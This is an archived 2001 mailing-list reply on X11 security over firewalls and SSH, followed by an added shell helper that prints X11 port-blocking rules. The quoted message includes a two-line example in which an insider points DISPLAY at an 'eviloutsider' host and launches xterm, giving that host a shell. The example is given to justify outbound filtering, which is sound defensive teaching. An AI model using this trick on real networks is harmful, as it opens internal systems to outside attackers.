Re: X Window over SSH

From: Matthew Collins (pingu@zymurgy.org)
Date: 08/13/01


Date: Mon, 13 Aug 2001 13:57:03 +0100
From: Matthew Collins <pingu@zymurgy.org>
To: Rajeev Kumar <rajeev@rajeevnet.com>
Subject: Re: X Window over SSH
Message-ID: <20010813135703.B96299@keg.zymurgy.org>

On Fri, Aug 10, 2001 at 10:13:03AM -0400, Rajeev Kumar wrote:
> Greg,
> As you know X11 works in sort of a reverse way as far as user perception of client/server
> matters. Once you are running an X server on your machine it runs by default on port 6000 but
> this can be relocated and in case of more than one display attached to your machine you can
> run the X server listening on more than one port, i.e. 6000 for the 1st display, 6001 for the second
> display and so on. A user on the remote end throwing a display on your machine will then set up the
> environment variable like:
>
> setenv DISPLAY yourhost:0.0 (for first display at port 6000)
> setenv DISPLAY yourhost:0.1 (for 2nd display, at port 6001)
>
> Generally you know the xhost command can be used on the server side to control access to your X
> server, but in general users run something like xhost + and leave their X server open to all.
>
> Now very important part on firewall side:
> -----------------------------------------------
> [1] You surely block incoming ports 6000-6064 (assuming nobody will run an X server above
> 6064), so that will protect your inside users. I guess everybody does this by default
> these days.
>
> !!!!!!!! IMPORTANT !!!!!!!!!!
> [2] This one is important:
> You should also block outgoing ports 6000-6064 on your firewall. If you don't do this (and I
> know many companies open all outgoing access) then anybody from inside your network can do
> something like this.
>
> inside% setenv DISPLAY eviloutsider:0.0
> inside% xterm&
>
> i.e. that will give an xterm to eviloutsider on your network machine, and the user on the eviloutsider
> machine then can do anything your inside users can do, like fire up a web browser and look
> at your intranet.
>
> This is also very dangerous even if you are using NAT. Generally people think if you are using
> NAT (Hide NAT in Checkpoint or Linux MASQ NAT) you are safe, because nobody can connect to
> you from outside. Now see above: in NATed networks users from inside can provide an xterm
> (or any X application) to an outsider (since the connection is from inside to outside). So in any
> case block 6000-6064 always (incoming/outgoing).
>
>
> With SSH you can port forward X11 traffic over the SSH channel. So that is safe. Meaning only
> ssh users can fire up an X service and those are trusted :-)
>
Bear in mind with this situation:

[ trusted user a ] ---- <internet> ---- [fw] ---- <lan> ---- [ ssh host b ]

when "a" ssh's into "b" and runs xterm the xterm's security is dependent on
the security of the system at "trusted user a" that is outside the firewall.

If you are going to let folks pull X applications back through your firewall
using SSH or otherwise, you need to ensure that their systems outside the LAN
have secured X displays (xhost -, filtered ports, patches up to date, decent
passwords, etc.).

Matt
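An added example, not part of this thread: a small POSIX shell helper that maps a DISPLAY value to the TCP port the X server would be reached on (6000 + display number), tells whether that display points at a remote host (and so crosses the perimeter the thread wants filtered), and prints the kind of bidirectional 6000-6064 filter rule the thread recommends. The iptables rule text and the interface name are hypothetical, written out as strings for review rather than applied.

```sh
#!/bin/sh
# Added example (not from the thread). X11 over TCP listens on 6000 + N for
# DISPLAY host:N.screen, which is why the thread says to block 6000-6064 in
# both directions.

# display_port "eviloutsider:0.0" -> 6000 ; "yourhost:3.0" -> 6003
display_port() {
    num=${1##*:}        # drop the host part (everything up to the last ':')
    num=${num%%.*}      # drop the screen part (after the '.')
    case $num in
        ''|*[!0-9]*) return 1 ;;   # not a display number
    esac
    echo $((6000 + num))
}

# True when DISPLAY names a host other than the local machine, i.e. the X
# traffic would leave over TCP and be subject to the firewall's outbound rules.
display_is_remote() {
    host=${1%%:*}
    case $host in
        ''|localhost|127.0.0.1|unix) return 1 ;;
        *) return 0 ;;
    esac
}

# True when a port falls inside the range the thread says to filter.
in_x11_range() {
    [ "$1" -ge 6000 ] && [ "$1" -le 6064 ]
}

# Print the inbound and outbound drop rules for an external interface name
# (hypothetical iptables syntax, emitted as text so it can be reviewed first).
x11_block_rules() {
    ext=$1
    printf '%s\n' \
      "iptables -A FORWARD -i $ext -p tcp --dport 6000:6064 -j DROP" \
      "iptables -A FORWARD -o $ext -p tcp --dport 6000:6064 -j DROP"
}
```

Running `display_port` on the thread's `eviloutsider:0.0` example gives 6000, which `in_x11_range` confirms is covered by the rules `x11_block_rules` prints.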